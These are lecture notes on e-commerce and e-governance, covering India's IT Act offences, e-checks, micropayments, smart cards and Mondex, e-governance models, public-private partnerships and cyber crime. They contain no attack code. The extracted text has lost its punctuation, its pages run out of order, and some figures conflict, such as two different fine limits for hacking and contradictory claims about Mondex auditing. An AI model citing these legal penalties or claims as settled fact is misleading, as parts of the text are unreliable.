Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
